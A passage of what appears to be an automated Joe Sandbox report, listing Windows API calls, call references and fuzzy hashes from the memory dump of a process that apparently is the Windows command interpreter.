                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,00000000,?,00000000), ref: 00B081BE
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B0818C
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B08197
                                                                            • longjmp.MSVCRT(00B40A30,00000001,-00000001,00000000,?,00000000), ref: 00B1B09E
                                                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0AB
                                                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0C1
                                                                            • fprintf.MSVCRT ref: 00B1B0D5
                                                                            • fflush.MSVCRT ref: 00B1B0E3
                                                                              • Part of subcall function 00B08F21: _wcsicmp.MSVCRT ref: 00B08FCD
                                                                              • Part of subcall function 00B08F21: _wcsicmp.MSVCRT ref: 00B08FE3
                                                                              • Part of subcall function 00B08F21: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B09002
                                                                              • Part of subcall function 00B08F21: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B09013
                                                                              • Part of subcall function 00B08E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B48BF0,00000000,?), ref: 00B08EC3
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D3A
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D44
                                                                              • Part of subcall function 00B11CD5: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D57
                                                                              • Part of subcall function 00B11CD5: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00B080F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 00B11D61
                                                                              • Part of subcall function 00B101F5: wcsrchr.MSVCRT ref: 00B101FB
                                                                            Similarity
                                                                            • API ID: Error$Mode$AttributesCriticalFileHeapLastSection_wcsicmpmemset$AllocCurrentDirectoryEnterFullLeaveNamePathProcessfflushfprintflongjmpwcsrchr
                                                                            • String ID:
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B28B7B
                                                                            • FlushFileBuffers.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B29323,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B28B83
                                                                              • Part of subcall function 00B0A16C: _close.MSVCRT ref: 00B0A19B
                                                                            • _get_osfhandle.MSVCRT ref: 00B28BB5
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28BBD
                                                                            • _get_osfhandle.MSVCRT ref: 00B28BCF
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28BD7
                                                                            • memcmp.MSVCRT(?,?,?), ref: 00B28BED
                                                                              • Part of subcall function 00B1654B: _wcsicmp.MSVCRT ref: 00B165A4
                                                                              • Part of subcall function 00B1654B: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00B165D7
                                                                              • Part of subcall function 00B1654B: _open_osfhandle.MSVCRT ref: 00B165EB
                                                                              • Part of subcall function 00B1654B: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00B22092
                                                                            • _get_osfhandle.MSVCRT ref: 00B28C1A
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B28C22
                                                                            Similarity
                                                                            • API ID: File$_get_osfhandle$Pointer$BuffersCloseCreateFlushHandleRead_close_open_osfhandle_wcsicmpmemcmp
                                                                            • String ID:
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: %s
                                                                            APIs
                                                                              • Part of subcall function 00B0DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000), ref: 00B0DCE1
                                                                              • Part of subcall function 00B0DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00B0ACD8,00000001,?,00000000,00B08C23,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000), ref: 00B0DCE8
                                                                            • _wcsnicmp.MSVCRT ref: 00B0C1B7
                                                                            • wcstol.MSVCRT ref: 00B0C1FC
                                                                            • wcstol.MSVCRT ref: 00B0C28A
                                                                            • longjmp.MSVCRT(?,000000FF), ref: 00B1CFB0
                                                                            • longjmp.MSVCRT(?,000000FF), ref: 00B1CFC4
Similarity
• API ID: Heaplongjmpwcstol$AllocProcess_wcsnicmp
• String ID:
APIs
• memset.MSVCRT ref: 00B12795
  • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
• memset.MSVCRT ref: 00B1280E
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,00000000,00000000,00000000,00000104,-00000001,?,00000002,00000000), ref: 00B1281D
• GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(DIRCMD,?,?,00000000), ref: 00B12857
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,00000002,00000000), ref: 00B1290B
Similarity
• API ID: memset$EnvironmentVariable
• String ID: DIRCMD
Similarity
• API ID: wcschr$iswdigit
• String ID: +-~!$<>+-*/%()|^&=,
APIs
  • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
  • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
  • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
  • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
  • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
  • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
• _get_osfhandle.MSVCRT ref: 00B186E3
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B186EB
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00B1872A
• _get_osfhandle.MSVCRT ref: 00B18743
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1874B
  • Part of subcall function 00B09B3B: _get_osfhandle.MSVCRT ref: 00B09B4E
  • Part of subcall function 00B09B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
  • Part of subcall function 00B09B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
• longjmp.MSVCRT(00B40A30,00000001), ref: 00B187CE
Similarity
• API ID: Console_get_osfhandle$Write$FileLockModeShared$AcquireByteCharHandleMultiReleaseTypeWidelongjmp
• String ID:
APIs
  • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
  • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
  • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
  • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
• iswspace.MSVCRT ref: 00B061E4
Similarity
• API ID: wcschr$iswspace
• String ID:
Similarity
• API ID: _wcsicmp
• String ID: ELSE$IF/?
APIs
  • Part of subcall function 00B1643A: NtOpenThreadToken.NTDLL ref: 00B16454
  • Part of subcall function 00B1643A: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00B1646C
  • Part of subcall function 00B1643A: NtClose.NTDLL ref: 00B164BD
• SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 00B163B5
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 00B163E3
• RtlNtStatusToDosError.NTDLL ref: 00B21EF4
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B21EFB
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?,000000FF,00000002,00000000), ref: 00B21F6B
• wcsstr.MSVCRT ref: 00B21F86
• wcsstr.MSVCRT ref: 00B21FA4
  • Part of subcall function 00B1640A: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,00B29C96,00B1FDFA,00000000,?), ref: 00B1642F
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
APIs
• memset.MSVCRT ref: 00B29AC2
  • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,-00000105,?,00000000,?), ref: 00B29B22
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,?), ref: 00B29B32
• SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,-00000105,?,00000000,?), ref: 00B29BAD
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00B29BB8
• SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?), ref: 00B29BCB
• ??_V@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,?), ref: 00B29BF9
Similarity
• API ID: Error$CurrentDirectoryModememset$Last
• String ID:
APIs
• RoInitialize.API-MS-WIN-CORE-WINRT-L1-1-0(00000000,00000000,00000000,00000001), ref: 00B2B717
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0 ref: 00B2B72A
• RoUninitialize.API-MS-WIN-CORE-WINRT-L1-1-0(?,?,?), ref: 00B2B7FC
  • Part of subcall function 00B08235: _get_osfhandle.MSVCRT ref: 00B0824E
  • Part of subcall function 00B08235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B08256
  • Part of subcall function 00B08235: _get_osfhandle.MSVCRT ref: 00B08264
  • Part of subcall function 00B08235: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0826C
• memset.MSVCRT ref: 00B2B76D
• GetConsoleWindow.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-0(?,?,?), ref: 00B2B788
Similarity
• API ID: Console$ModeWindow_get_osfhandle$InitializeUninitializememset
• String ID: <
APIs
• WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,?,?,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08203
• GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B0820E
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B08229
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0AB
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00B27FC9,?,00B299AE,00000000,?,00000000,00B1CF94,00000000,?), ref: 00B1B0C1
• fprintf.MSVCRT ref: 00B1B0D5
• fflush.MSVCRT ref: 00B1B0E3
                                                                            Similarity
                                                                            • API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
                                                                            • String ID:
                                                                            • API String ID: 4271573189-0
                                                                            • Opcode ID: feb291b6f0f7f43d04710d5bbbe58d1681840d375a953f415aeccf5d7f075b50
                                                                            • Instruction ID: c55f3b515a469695507d241c927a634f0af57df5d23bc69bca3c002f1793dceb
                                                                            • Opcode Fuzzy Hash: feb291b6f0f7f43d04710d5bbbe58d1681840d375a953f415aeccf5d7f075b50
                                                                            • Instruction Fuzzy Hash: EF014F35049214FFEB116BA8ED0EA9E7AACFB0B315F100145F125A31F1CFB55741AB62
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B13D30
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,?,00000000), ref: 00B13E3D
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,00000000), ref: 00B13E88
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$FullNamePath
                                                                            • String ID:
                                                                            • API String ID: 3158150540-0
                                                                            • Opcode ID: c18e7de6a0b1a7978eac9836d8a2feb33a6563b9b51c32712f15b2cd4e40a328
                                                                            • Instruction ID: 8cc70a89468423824e029df2124d562cb0b773720f0475c7eba38f5ae91e6dda
                                                                            • Opcode Fuzzy Hash: c18e7de6a0b1a7978eac9836d8a2feb33a6563b9b51c32712f15b2cd4e40a328
                                                                            • Instruction Fuzzy Hash: CA027135A002169BCB24DF68D8956FAB3F1FF48714F9841E9D80A97294E734AEC2CF54
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B1858D
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B18595
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000002), ref: 00B185D4
                                                                            • _get_osfhandle.MSVCRT ref: 00B185ED
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B185F5
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$Write_get_osfhandle$Mode
                                                                            • String ID:
                                                                            • API String ID: 1066134489-0
                                                                            • Opcode ID: 1bb03955611442c80b9a5f183c50cc7b2126fa7fa45fb6f47a66861ba1213724
                                                                            • Instruction ID: 1c9bb00b5468d334cf009215cd7c412537fffb8b02f6f0b621d95cc180b5b82e
                                                                            • Opcode Fuzzy Hash: 1bb03955611442c80b9a5f183c50cc7b2126fa7fa45fb6f47a66861ba1213724
                                                                            • Instruction Fuzzy Hash: B841D371A002009BCF289F78D889AAEB7E9FB50344F5444E9E906DB2C5EF70DD80CB51
                                                                            APIs
                                                                            • _tell.MSVCRT ref: 00B0B7F9
                                                                            • _close.MSVCRT ref: 00B0B82C
                                                                            • memset.MSVCRT ref: 00B0B8CC
                                                                            • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00B0B936
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B0B947
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B0B96D
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleInfoOutput_close_tellmemset
                                                                            • String ID:
                                                                            • API String ID: 1380661413-0
                                                                            • Opcode ID: 44feb5a4d4f8d4d9fdf70bb25098d5e5cbaa42e0d9db730eb0705d1ca1cb4382
                                                                            • Instruction ID: 5ff057c8db16bd50b1725b6fb57b0ec126f393b4b141f96d653ad3dacc020b37
                                                                            • Opcode Fuzzy Hash: 44feb5a4d4f8d4d9fdf70bb25098d5e5cbaa42e0d9db730eb0705d1ca1cb4382
                                                                            • Instruction Fuzzy Hash: 8041E671A403409BDB359F28D849B6E7FE5EB85314F2449ACE895972E0EB30DC85CB52
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B07F7C
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000001), ref: 00B07FC0
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00B07FF3
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,00000001), ref: 00B0800C
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B1B05A
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$DriveInformationTypeVolume
                                                                            • String ID:
                                                                            • API String ID: 285405857-0
                                                                            • Opcode ID: a05e663bcf6ea8c426ef58d577f139b3342fc96cc4423024f40466efeb28470f
                                                                            • Instruction ID: 0ec9971a3926fc4b1874dd5b2f85f5d7281a6f1325f1fc729da44ed068261620
                                                                            • Opcode Fuzzy Hash: a05e663bcf6ea8c426ef58d577f139b3342fc96cc4423024f40466efeb28470f
                                                                            • Instruction Fuzzy Hash: B5314371910219ABDF24DBA5DC99AEF7BF8FF49344F040499E415E3190EB34DA84CB25
                                                                            APIs
                                                                              • Part of subcall function 00B09A11: _get_osfhandle.MSVCRT ref: 00B09A1C
                                                                              • Part of subcall function 00B09A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B0793A,00000104,?), ref: 00B09A2B
                                                                              • Part of subcall function 00B09A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A47
                                                                              • Part of subcall function 00B09A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A56
                                                                              • Part of subcall function 00B09A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374), ref: 00B09A61
                                                                              • Part of subcall function 00B09A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,?,?,?,?,?,?,?,?,?,00B07908,00002374,-00000001), ref: 00B09A6A
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,?,?,00B40AF0,00000002,?,?,00B1A669,%s %s ,?,?,00000000), ref: 00B099DC
                                                                            • _get_osfhandle.MSVCRT ref: 00B099EC
                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00B1A669,%s %s ,?,?,00000000), ref: 00B099F4
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B09A09
                                                                              • Part of subcall function 00B09B3B: _get_osfhandle.MSVCRT ref: 00B09B4E
                                                                              • Part of subcall function 00B09B3B: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
                                                                              • Part of subcall function 00B09B3B: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                            • String ID:
                                                                            • API String ID: 4057327938-0
                                                                            • Opcode ID: f864e3f0a67762f39412f018e27397ebbf67ef3051f6a10842dd41942d59fde7
                                                                            • Instruction ID: f1f0a5d6b0fb76da6096b6f3d11d150cebf97cf23bd4e3776165d91c9f68dd8d
                                                                            • Opcode Fuzzy Hash: f864e3f0a67762f39412f018e27397ebbf67ef3051f6a10842dd41942d59fde7
                                                                            • Instruction Fuzzy Hash: 41213D327C4315ABE7246BB55CCAB6E6ADCEB45B55F1000BEF607C71C2EEA0CD009161
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B09B4E
                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,000000FF,00B3A7F0,00002000,00000000,00000000), ref: 00B09B8E
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,-00000001,?,00000000), ref: 00B09BA3
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B40AF0,?,?,00000000), ref: 00B1C0BC
                                                                            • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00B40AF0,00001000,00B3A7F0,00002000,00000000,00000000,00B40AEE), ref: 00B1C0DC
                                                                            • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F0,00000000,?,00000000), ref: 00B1C0FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                                                            • String ID:
                                                                            • API String ID: 3249344982-0
                                                                            • Opcode ID: 8d7c815e2ef5c4b062cba3593801c2fad4d3cc4d9a5c3336afca5e55b9cc589a
                                                                            • Instruction ID: 3e1ba726f4e5862964887e5f51f692295b83f7e043cadd3a9c672ebad79c3afb
                                                                            • Opcode Fuzzy Hash: 8d7c815e2ef5c4b062cba3593801c2fad4d3cc4d9a5c3336afca5e55b9cc589a
                                                                            • Instruction Fuzzy Hash: 7A219DB6680201FFEB205B64AC89F6A7BBDEB05760F2040A5F941E32D0DAB09E40C665
                                                                            APIs
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BCA7
                                                                              • Part of subcall function 00B0BC30: iswspace.MSVCRT ref: 00B0BD1D
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD39
                                                                              • Part of subcall function 00B0BC30: wcschr.MSVCRT ref: 00B0BD5D
                                                                            • _wcsicmp.MSVCRT ref: 00B275AC
                                                                            • _wcsicmp.MSVCRT ref: 00B275CB
                                                                            • _wcsicmp.MSVCRT ref: 00B275F1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmpwcschr$iswspace
                                                                            • String ID: KEYS$LIST$OFF
                                                                            • API String ID: 3924973218-4129271751
                                                                            • Opcode ID: bfcfcb6427cf37f6d8de145d93a9dede7a20bc2cf3422db2027b413dac5bcf23
                                                                            • Instruction ID: ce37ff64376713bf6e5e1b8227413257e64096e22f91ee13d76ca99c8014f3bc
                                                                            • Opcode Fuzzy Hash: bfcfcb6427cf37f6d8de145d93a9dede7a20bc2cf3422db2027b413dac5bcf23
                                                                            • Instruction Fuzzy Hash: C1118C326CC7219BE3295719BC9AC7BBBDCFBE5720374409EF50A861C0EE615B01815D
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0DDA3
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B1C050), ref: 00B0DDAD
                                                                            • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00B0DDD6
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,00000001), ref: 00B0DDE5
